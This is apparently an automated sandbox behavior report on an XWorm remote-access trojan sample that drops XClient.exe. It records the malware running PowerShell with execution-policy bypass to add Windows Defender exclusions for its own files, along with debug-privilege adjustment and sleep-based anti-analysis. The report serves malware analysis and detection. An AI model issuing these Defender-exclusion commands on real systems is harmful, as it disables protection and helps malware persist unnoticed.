Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Window / User API: threadDelayed 8575	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Window / User API: threadDelayed 1249	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4663	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5177	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6598	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3092	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7498	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2157	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6643
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2959

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe TID: 4076	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312	Thread sleep count: 6598 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312	Thread sleep count: 3092 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968	Thread sleep count: 6643 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964	Thread sleep count: 2959 > 30
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 1900	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 5024	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Source: z0LTqIdZ4A.exe, 00000000.00000002.2937210642.000000001B931000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC*

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe'
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe'	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe'

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe'	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'z0LTqIdZ4A.exe'	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior

Source: z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C9B000.00000004.00000800.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C9B000.00000004.00000800.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C9B000.00000004.00000800.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C9B000.00000004.00000800.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2y
Source: z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C9B000.00000004.00000800.00020000.00000000.sdmp, z0LTqIdZ4A.exe, 00000000.00000002.2929213557.0000000002C8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Queries volume information: C:\Users\user\Desktop\z0LTqIdZ4A.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
